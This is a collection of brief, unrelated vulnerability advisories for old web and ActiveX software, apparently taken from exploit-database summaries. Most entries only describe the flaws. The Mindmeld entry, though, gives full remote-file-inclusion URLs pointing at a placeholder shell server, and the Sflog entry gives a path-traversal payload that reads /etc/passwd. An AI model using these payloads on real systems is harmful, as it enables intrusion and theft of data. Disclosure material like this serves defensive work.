An attacker can exploit a SQL injection vulnerability in the com_restaurant component of Joomla! by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the back-end database.
An attacker can exploit a SQL injection vulnerability in the com_catalogshop component of Joomla! to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'index.php' script when 'func' is set to 'detail'. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation could result in unauthorized access to sensitive information in the back-end database.
An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'id' of the 'index.php' script. This can be used to extract data from the database, modify data, delete data, or even execute commands on the operating system.
A vulnerability exists in Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) which allows an attacker to write arbitrary files to the system. This is due to the insecure use of the SavePkcs8File method which allows an attacker to write arbitrary files to the system.
Sflog! 0.96 is vulnerable to remote file disclosure. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request should contain a malicious URL with the ‘blog’ and ‘permalink’ parameters set to ‘../../../../../../../../../../etc/passwd’. This will allow the attacker to view the contents of the ‘/etc/passwd’ file.
Mindmeld is an enterprise-capable knowledge-sharing system written in PHP. There are multiple remote file inclusion vulnerabilities in Mindmeld version 1.2.0.10 (latest version). The vulnerable files and lines are Mindmeld-1.2.0.10/acweb/admin_index.php: line 51, Mindmeld-1.2.0.10/include/ask.inc.php: line 34, Mindmeld-1.2.0.10/include/learn.inc.php: line 38, Mindmeld-1.2.0.10/include/manage.inc.php: line 31, Mindmeld-1.2.0.10/include/mind.inc.php: line 33, Mindmeld-1.2.0.10/include/sensory.inc.php: line 70. The PoC for each of these vulnerabilities is http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php? respectively. These vulnerabilities have been disclosed to the vendor although development on this software has been discontinued.
This exploit is a buffer overflow vulnerability in MySpaceUploader.ocx and Aurigma ImageUploader4.ocx. It was written by e.b. and tested on Windows XP SP2 (fully patched) English, IE6. The MySpaceUploader.ocx version is 1.0.0.4 and the Aurigma ImageUploader4.ocx version is 4.5.70.0. The exploit was developed with the help of h.d.m. and the Metasploit crew.
A Remote File Inclusion (RFI) vulnerability exists in PHP Links from DeltaScripts version 1.3 and earlier. The vulnerability is due to the application including files based on user-supplied input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, resulting in the execution of arbitrary code on the vulnerable system.
A vulnerability in CHRONOFORMS version V2.3.5 allows an attacker to include a remote file via the mosConfig_absolute_path parameter in the following files: /administrator/components/com_chronocontact/excelwriter/Writer.php, /administrator/components/com_chronocontact/excelwriter/PPS.php, /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php, /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php, /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php, /administrator/components/com_chronocontact/excelwriter/Writer/Format.php, and /administrator/components/com_chronocontact/excelwriter/Writer/Parser.php.
An attacker is able to execute arbitrary shell commands with the privileges of the web server process, such as user 'nobody','apache' or 'www'. This is caused by unsanitized user-submitted POST variables 'quality', 'angle' and 'clipval' in the function 'rotateImage' in 'include/imageObjectIM.class.php'.